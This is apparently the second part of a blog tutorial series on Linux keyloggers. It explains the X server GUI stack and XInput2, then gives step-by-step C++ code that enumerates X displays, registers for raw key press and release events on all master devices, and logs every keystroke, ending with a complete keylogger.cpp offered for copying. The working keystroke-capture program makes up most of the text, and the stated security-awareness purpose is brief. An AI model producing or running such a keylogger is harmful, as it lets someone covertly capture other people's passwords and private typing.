In "Complete Guide to Keylogging in Linux: Part 1", we discussed how to write keyloggers for Linux by reading keyboard device events. This article continues the discussion of keyboard event capture, this time through the X server, so you can understand more of the techniques that keylogger attacks rely on.

What is the Linux GUI Stack?

On Operating Systems (OSes) like Windows, the Graphical User Interface (GUI) is part of the OS itself. Linux, however, does not have a GUI built in. Instead, a stack of applications, libraries, and protocols manages the GUI. Here is what a generic stack looks like:


    +---------------+                                      +--------------+
    |   Display:2   |<--=---+                    +----=--->|   WxWidget   |-----+
    +---------------+       |                    |         +--------------+     |
                            |                    |                              |
    +---------------+       |                    |         +--------------+     |
    |   Display:1   |<--=---+                    +----=--->|      Qt      |-----+
    +---------------+       |                    |         +--------------+     |
                            |                    |                              |
    +---------------+       |                    |         +--------------+     |
    |   Display:0   |<--=---+                    +----=--->|     GTK+     |-----+
    +---------------+       |                    |         +--------------+     |
                            |                    |                              |
                            |                    |                              |
     update   +-------------+--+  ---=---> +-----+--------+   send data         |
    +------=--|    X Server    |           |     xlib     |<-------------=------+
    | screen  +----------------+  <--=---- +--------------+   ask to repaint
    |             ^
    |             | events
    |   +---------+----------------+
    +-->|       Linux Kernel       |
        +--------------------------+
 
 

Within this stack, the X server sits between the GUI and the OS and provides basic primitives. It implements the "windows, icons, menus, pointer" paradigm in a network-oriented protocol, which allows you to draw the screen on a different system from the one running the application. The stack is extensible by design: GUI toolkits such as GTK+ and Qt build on the lower-level libraries and wrap them in user-friendly functions and controls, so developers can design applications according to their own UI needs. Desktop environments then run these applications alongside traditional elements and controls such as launchers, wallpapers, and drag and drop.

What X Server Terminology Should I Know?

Let's review a few non-intuitive terms that the X server uses:

  • **display** refers to an X server instance.
  • **screen** is a virtual framebuffer associated with a display. A display can have more than one screen.
  • **monitor** is the physical device on which the framebuffer is drawn. A screen usually maps to one monitor, but one screen can also be shown on two monitors, either as a mirrored view or as one large screen spanning both.
  • **root window** is the window in which everything is drawn, and it serves as the root node of the window tree.
  • **virtual core device** refers to the virtual core pointer and virtual core keyboard of a server. These master devices do not depend on the presence of physical input devices, and they do not generate events on their own. Master devices deliver core events in a range that matches the display resolution, as well as events in device-specific resolution. Clients receive the latter once they register through the XInput extension, and they can also open physical devices directly for non-core events.

How Does Keylogging Work in an X Server?

Input capture can be summarized in the following basic steps:

  • Check if the X server is running
  • Enumerate available displays
  • Open desired display
  • Check if XInputExtension is available
  • Set event mask to enable key press and key release events
  • Read events from display in loop
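
The first step has no dedicated snippet in the sections that follow, so here is a minimal sketch of one possible check. It assumes the conventional socket directory "/tmp/.X11-unix" described later in this article; the helper name `HasX11Sockets` is hypothetical and not part of Xlib. It only tests for the presence of socket entries and says nothing about whether a server will accept a connection.

```cpp
#include <filesystem>
#include <string>
#include <system_error>

// Hypothetical helper (not an Xlib call): returns true when the given
// directory exists and holds at least one entry whose name starts with 'X'.
// The default path is the conventional X11 socket directory (an assumption).
bool HasX11Sockets(const std::string &dir = "/tmp/.X11-unix")
{
    std::error_code ec;
    if (!std::filesystem::is_directory(dir, ec))
        return false;

    // On failure the iterator equals the end iterator, so the loop is skipped.
    for (const auto &entry : std::filesystem::directory_iterator(dir, ec))
    {
        const std::string name = entry.path().filename().string();
        if (!name.empty() && name[0] == 'X')
            return true;
    }
    return false;
}
```

A caller could run `HasX11Sockets()` before attempting to open any display and skip the remaining steps when it returns false. A server configured with a different socket location would be missed by this check.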

How Can I Enumerate Displays?

By convention, a running X server creates a socket file in "/tmp/.X11-unix/" for each display. The file names follow the pattern "X<digits>", and the corresponding display name is ":<digits>". Enumerate this path and try to open each candidate display to confirm that the socket file belongs to a live X server. Here is the sample code for enumeration:


std::vector<std::string> EnumerateDisplay()
{
  std::vector<std::string> displays;
 
  for (auto &p : std::filesystem::directory_iterator("/tmp/.X11-unix"))
  {
    std::string path = p.path().filename().string();
    std::string display_name = ":";
   
    if (path[0] != 'X') continue;
   
    path.erase(0, 1);
    display_name.append(path);
   
    Display *disp = XOpenDisplay(display_name.c_str());
    if (disp != NULL)
    {
      int count = XScreenCount(disp);
      printf("Display %s has %d screens\n",
        display_name.c_str(), count);

      int i;
      for (i=0; i<count; i++)
        printf(" %d: %dx%d\n",
          i, XDisplayWidth(disp, i), XDisplayHeight(disp, i));

      XCloseDisplay(disp);
     
      displays.push_back(display_name);
    }
  }
 
  return displays;
}

The function also prints the screens and their dimensions for each detected display. In this example, display :0 has one screen of 1920x1080:
 

Display :0 has 1 screens
 0: 1920x1080
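
The enumeration code above only checks that a file name starts with 'X'. As a small illustration of the "X<digits>" to ":<digits>" naming convention, the sketch below validates the whole name before building the display name. The helper `SocketNameToDisplay` is a hypothetical name introduced here, and the strict digits-only rule is an assumption based on the pattern described above.

```cpp
#include <cctype>
#include <cstddef>
#include <optional>
#include <string>

// Hypothetical helper: maps a socket file name such as "X0" to the display
// name ":0". Returns std::nullopt when the name is not 'X' followed by
// one or more decimal digits.
std::optional<std::string> SocketNameToDisplay(const std::string &file_name)
{
    if (file_name.size() < 2 || file_name[0] != 'X')
        return std::nullopt;

    for (std::size_t i = 1; i < file_name.size(); ++i)
    {
        if (!std::isdigit(static_cast<unsigned char>(file_name[i])))
            return std::nullopt;
    }
    return ":" + file_name.substr(1);
}
```

Returning an optional keeps the decision about unexpected file names with the caller, which can simply skip them during enumeration.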
 
 
 

 

How Can I Detect XInputExtension?

Use "XQueryExtension" to check whether an extension is available on the selected display. Extensions may change their behavior in future versions, so limit use to the specific versions the code has been tested against. In this example, we will stick with version 2.0 of XInputExtension for the code snippet:


// Set up X
Display * disp = XOpenDisplay(hostname);
if (NULL == disp)
{
    std::cerr << "Cannot open X display: " << hostname << std::endl;
    exit(1);
}
 
// Test for XInput 2 extension
int xiOpcode, queryEvent, queryError;
if (! XQueryExtension(disp, "XInputExtension", &xiOpcode, &queryEvent, &queryError)) 
{
    std::cerr << "X Input extension not available" << std::endl;
    exit(2);
}
// Request XInput 2.0, guarding against changes in future versions
int major = 2, minor = 0;
int queryResult = XIQueryVersion(disp, &major, &minor);
if (queryResult == BadRequest) 
{
    std::cerr << "Need XI 2.0 support (got " << major << "." << minor << ")" << std::endl;
    exit(3);
}
else if (queryResult != Success) 
{
    std::cerr << "Internal error" << std::endl;
    exit(4);
}

How Do I Register for Events?

Event masks are bit fields in which each event type is selected by the bit (1 << event type). Set a mask to tell the X server which events you are interested in. The mask is passed in the following structure:


typedef struct {
    int deviceid;
    int mask_len;
    unsigned char* mask;
} XIEventMask;

If deviceid is a valid device ID, the event mask is selected on that device only. If deviceid is XIAllDevices or XIAllMasterDevices, the event mask is selected for all devices or for all master devices, respectively. The effective event mask for a device is the bit-wise OR of the XIAllDevices mask, the XIAllMasterDevices mask, and the device's own mask. The mask_len field specifies the length of the mask in bytes. Set up your mask as follows:

Window root = DefaultRootWindow(disp);
 
XIEventMask m;
m.deviceid = XIAllMasterDevices;
m.mask_len = XIMaskLen(XI_LASTEVENT);
m.mask = (unsigned char*)calloc(m.mask_len, sizeof(char));
XISetMask(m.mask, XI_RawKeyPress);
XISetMask(m.mask, XI_RawKeyRelease);
 
XISelectEvents(disp, root, &m, 1);
XSync(disp, false);
free(m.mask); 
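
To make the bit layout concrete, here is a standalone sketch that mirrors what the XIMaskLen and XISetMask macros compute, without depending on the X11 headers. The function names are hypothetical. The two event constants are assumptions copied from X11/extensions/XI2.h for illustration only, so real code should use the header's own definitions.

```cpp
#include <cstddef>
#include <vector>

// Assumed values, copied from X11/extensions/XI2.h for illustration only.
constexpr int kRawKeyPress   = 13;  // XI_RawKeyPress
constexpr int kRawKeyRelease = 14;  // XI_RawKeyRelease

// Mirrors XIMaskLen: bytes needed to hold bits 0..last_event.
constexpr std::size_t MaskLen(int last_event)
{
    return static_cast<std::size_t>((last_event >> 3) + 1);
}

// Mirrors XISetMask: event N lives in byte N / 8, bit N % 8.
void SetMaskBit(std::vector<unsigned char> &mask, int event)
{
    mask[event >> 3] |= static_cast<unsigned char>(1u << (event & 7));
}

// Mirrors XIMaskIsSet: tests the bit that SetMaskBit would set.
bool MaskBitIsSet(const std::vector<unsigned char> &mask, int event)
{
    return (mask[event >> 3] & (1u << (event & 7))) != 0;
}

// Builds a zeroed mask and selects the two raw key events.
std::vector<unsigned char> BuildRawKeyMask(int last_event)
{
    std::vector<unsigned char> mask(MaskLen(last_event), 0);
    SetMaskBit(mask, kRawKeyPress);
    SetMaskBit(mask, kRawKeyRelease);
    return mask;
}
```

For example, with an upper bound of 17 passed as last_event (an arbitrary value chosen for this illustration), the mask is three bytes long and only the second byte is non-zero, holding bits 5 and 6.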

How Can I Read Events?

Read the events in a loop. Take the next event using "XNextEvent()", then check its field values to make sure it is one of the events you registered for. The event arrives as an XGenericEventCookie, which Xlib already defines as shown here, followed by the loop itself:


typedef struct {
    int type;
    unsigned long serial;
    Bool send_event;
    Display *display;
    int extension;
    int evtype;
    unsigned int cookie;
    void *data;
} XGenericEventCookie; 

while (true) 
{
    XEvent event;
    XGenericEventCookie *cookie = (XGenericEventCookie*)&event.xcookie;
    XNextEvent(disp, &event);
 
    // Only cookies claimed with XGetEventData carry valid data
    if (!XGetEventData(disp, cookie)) continue;
 
    if (cookie->type == GenericEvent &&
            cookie->extension == xiOpcode) 
    {
        switch (cookie->evtype)
        {
            case XI_RawKeyRelease:
            case XI_RawKeyPress: 
            {
                XIRawEvent *ev = (XIRawEvent*)cookie->data;
 
                // Ask X what it calls that key
                KeySym s = XkbKeycodeToKeysym(disp, ev->detail, 0, 0);
                char *str = (NoSymbol == s) ? NULL : XKeysymToString(s);
                if (NULL != str)
                    std::cout << (cookie->evtype == XI_RawKeyPress ? "+" : "-") << str << " " << std::flush;
                break;
            }
        }
    }
 
    // Release the event data claimed by XGetEventData
    XFreeEventData(disp, cookie);
}
 

Unlike in our previous post, where we had to map scan codes to keys manually, this code does not need its own mapping table. The X server does the heavy lifting by applying the current keyboard layout and its scan code mapping.

What is the Complete Code?

The complete code, keylogger.cpp, is listed at the end of this article. You can copy it and use it for experimenting and testing.

Final Thoughts on Keylogging in Linux

Understanding how keyloggers capture input on Linux helps you assess the risks to data and network security on your systems. Knowing how the GUI stack and the X server protocol handle input events is a useful step toward improving your security posture. Read Part 3 of this series next to learn more about keylogging in Linux.

keylogger.cpp 


#include <X11/XKBlib.h>
#include <X11/extensions/XInput2.h>

#include <cstdio>
#include <cstdlib>
#include <cstring>
#include <filesystem>
#include <iostream>
#include <string>
#include <vector>
 
int printUsage(std::string application_name) 
{
    std::cout << "USAGE: " << application_name << " [-display ] [-enumerate] [-help]" << std::endl;
    std::cout << "display      target X display                   (default :0)" << std::endl;
    std::cout << "enumerate    enumerate all X11 displays" << std::endl;
    std::cout << "help         print this information and exit" << std::endl;
 
    exit(0);
}
 
std::vector<std::string> EnumerateDisplay()
{
    std::vector<std::string> displays;
    
    for (auto &p : std::filesystem::directory_iterator("/tmp/.X11-unix"))
    {
        std::string path = p.path().filename().string();
        std::string display_name = ":";
        
        if (path[0] != 'X') continue;
        
        path.erase(0, 1);
        display_name.append(path);
        
        Display *disp = XOpenDisplay(display_name.c_str());
        if (disp != NULL) 
        {
            int count = XScreenCount(disp);
            printf("Display %s has %d screens\n",
                display_name.c_str(), count);
 
            int i;
            for (i=0; i<count; i++)
                printf(" %d: %dx%d\n",
                    i, XDisplayWidth(disp, i), XDisplayHeight(disp, i));
 
            XCloseDisplay(disp);
            
            displays.push_back(display_name);
        }
    }
    
    return displays;
}
 
int main(int argc, char * argv[])
{
    const char * hostname    = ":0";
 
    // Get arguments
    for (int i = 1; i < argc; i++)
    {
        if      (!strcmp(argv[i], "-help"))
            printUsage(argv[0]);
        else if (!strcmp(argv[i], "-display") && i + 1 < argc)  // needs a value
            hostname    = argv[++i];
        else if (!strcmp(argv[i], "-enumerate"))
        {
            EnumerateDisplay();
            return 0;
        }
        else
        { 
            std::cerr << "Unknown argument: " << argv[i] << std::endl;
            printUsage(argv[0]); 
        }
    }
 
    // Set up X
    Display * disp = XOpenDisplay(hostname);
    if (NULL == disp)
    {
        std::cerr << "Cannot open X display: " << hostname << std::endl;
        exit(1);
    }
 
    // Test for XInput 2 extension
    int xiOpcode, queryEvent, queryError;
    if (! XQueryExtension(disp, "XInputExtension", &xiOpcode, &queryEvent, &queryError)) 
    {
        std::cerr << "X Input extension not available" << std::endl;
        exit(2);
    }
    { // Request XInput 2.0, guarding against changes in future versions
        int major = 2, minor = 0;
        int queryResult = XIQueryVersion(disp, &major, &minor);
        if (queryResult == BadRequest) 
        {
            std::cerr << "Need XI 2.0 support (got " << major << "." << minor << ")" << std::endl;
            exit(3);
        }
        else if (queryResult != Success) 
        {
            std::cerr << "Internal error" << std::endl;
            exit(4);
        }
    }
 
    // Register events
    Window root = DefaultRootWindow(disp);
    
    XIEventMask m;
    m.deviceid = XIAllMasterDevices;
    m.mask_len = XIMaskLen(XI_LASTEVENT);
    m.mask = (unsigned char*)calloc(m.mask_len, sizeof(char));
    XISetMask(m.mask, XI_RawKeyPress);
    XISetMask(m.mask, XI_RawKeyRelease);
    
    XISelectEvents(disp, root, &m, 1);
    XSync(disp, false);
    free(m.mask);
 
    while (true) 
    {
        XEvent event;
        XGenericEventCookie *cookie = (XGenericEventCookie*)&event.xcookie;
        XNextEvent(disp, &event);
 
        // Only cookies claimed with XGetEventData carry valid data
        if (!XGetEventData(disp, cookie)) continue;
 
        if (cookie->type == GenericEvent &&
                cookie->extension == xiOpcode) 
        {
            switch (cookie->evtype)
            {
                case XI_RawKeyRelease:
                case XI_RawKeyPress: 
                {
                    XIRawEvent *ev = (XIRawEvent*)cookie->data;
 
                    // Ask X what it calls that key
                    KeySym s = XkbKeycodeToKeysym(disp, ev->detail, 0, 0);
                    char *str = (NoSymbol == s) ? NULL : XKeysymToString(s);
                    if (NULL != str)
                        std::cout << (cookie->evtype == XI_RawKeyPress ? "+" : "-") << str << " " << std::flush;
                    break;
                }
            }
        }
 
        // Release the event data claimed by XGetEventData
        XFreeEventData(disp, cookie);
    }
}